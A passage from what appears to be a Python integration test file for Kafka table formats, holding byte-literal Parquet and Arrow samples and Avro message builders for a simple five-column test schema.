b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
],
},
'AvroConfluent': {
'data_sample': [
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
kafka_cluster.schema_registry_host,
8081
),
'supports_empty_value': True,
},
'Avro': {
# It seems impossible to send more than one avro file per a message
# because of nature of Avro: blocks go one after another
'data_sample': [
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
avro_message([{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1} for id in range(1, 16)]),
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'supports_empty_value': False,
},
'Arrow' : {
'data_sample' : [
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
